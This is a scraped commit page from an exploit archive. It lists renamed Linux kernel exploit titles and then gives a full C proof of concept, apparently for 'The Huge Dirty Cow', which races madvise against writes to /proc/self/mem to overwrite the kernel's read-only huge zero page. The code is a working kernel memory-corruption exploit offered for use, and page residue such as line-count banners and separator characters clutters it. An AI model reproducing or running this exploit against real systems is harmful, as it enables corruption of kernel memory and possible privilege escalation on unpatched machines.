224c305b0d
9 changes to exploits/shellcodes Linux 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux Kenel 2.6.37-rc1 - serial_core TIOCGICOUNT Leak Linux 2.6.36 IGMP - Remote Denial of Service Linux Kernel 2.6.36 IGMP - Remote Denial of Service Linux - SELinux W+X Protection Bypass via AIO Linux SELinux - W+X Protection Bypass via AIO Linux group_info refcounter - Overflow Memory Corruption Linux Kernel - 'group_info' refcounter Overflow Memory Corruption Linux io_submit L2TP sendmsg - Integer Overflow Linux Kernel - io_submit L2TP sendmsg Integer Overflow Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) Linux Kernel < 4.5.1 - Off-By-One (PoC) Linux Kernel - 'mincore()' Heap Page Disclosure (PoC) Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow Linux VServer Project 1.2x - CHRoot Breakout Linux VServer Project 1.2x - Chroot Breakout Linux espfix64 - Nested NMIs Interrupting Privilege Escalation Linux (x86) - Memory Sinkhole Privilege Escalation Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation Linux Kernel (x86) - Memory Sinkhole Privilege Escalation Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation
91 lines
No EOL
2.2 KiB
C
91 lines
No EOL
2.2 KiB
C
/*
|
|
* The code is modified from https://www.exploit-db.com/exploits/43199/
|
|
*/
|
|
#define _GNU_SOURCE
|
|
#include <unistd.h>
|
|
#include <sys/mman.h>
|
|
#include <err.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
#include <fcntl.h>
|
|
#include <sys/stat.h>
|
|
#include <sched.h>
|
|
#include <pthread.h>
|
|
#include <sys/types.h>
|
|
#include <sys/wait.h>
|
|
|
|
#define TRIES_PER_PAGE (20000000)
|
|
#define PAGE_SIZE (0x1000)
|
|
#define MEMESET_VAL (0x41)
|
|
#define MAP_SIZE (0x200000)
|
|
#define STRING "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
|
|
#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))
|
|
|
|
struct args{
|
|
int fd;
|
|
void *p;
|
|
int stop;
|
|
off_t off;
|
|
char *chp;
|
|
};
|
|
|
|
void *write_thread(struct args *arg) {
|
|
for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {
|
|
lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
|
|
write(arg->fd, STRING, sizeof(STRING));
|
|
lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);
|
|
}
|
|
return NULL;
|
|
}
|
|
|
|
void *wait_for_success(struct args *arg) {
|
|
while(*(arg->chp+arg->off*OFFSIZE) != 'A') {
|
|
int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);
|
|
sched_yield();
|
|
}
|
|
arg->stop = 1;
|
|
return NULL;
|
|
}
|
|
|
|
int main(void) {
|
|
struct args arg;
|
|
|
|
arg.off = 0;
|
|
|
|
arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
|
|
|
|
if(arg.p == MAP_FAILED)
|
|
perror("[!] mmap()");
|
|
arg.chp = arg.p;
|
|
printf("mmap address is %p\n", arg.p);
|
|
madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);
|
|
|
|
arg.fd = open("/proc/self/mem", O_RDWR);
|
|
if (arg.fd < 0) {
|
|
perror("[!] open()");
|
|
return 1;
|
|
}
|
|
|
|
|
|
while(arg.off < PAGE_SIZE/sizeof(STRING)) {
|
|
arg.stop = 0;
|
|
pthread_t thread0, thread1;
|
|
int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);
|
|
ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);
|
|
|
|
if (ret) {
|
|
perror("[!] pthread_create()");
|
|
return 1;
|
|
}
|
|
|
|
pthread_join(thread0, NULL);
|
|
pthread_join(thread1, NULL);
|
|
|
|
printf("[*] Done 0x%x String\n", arg.off);
|
|
arg.off++;
|
|
}
|
|
printf("[*] Overwrite a page\n");
|
|
printf("%s\n", arg.p);
|
|
return 0;
|
|
} |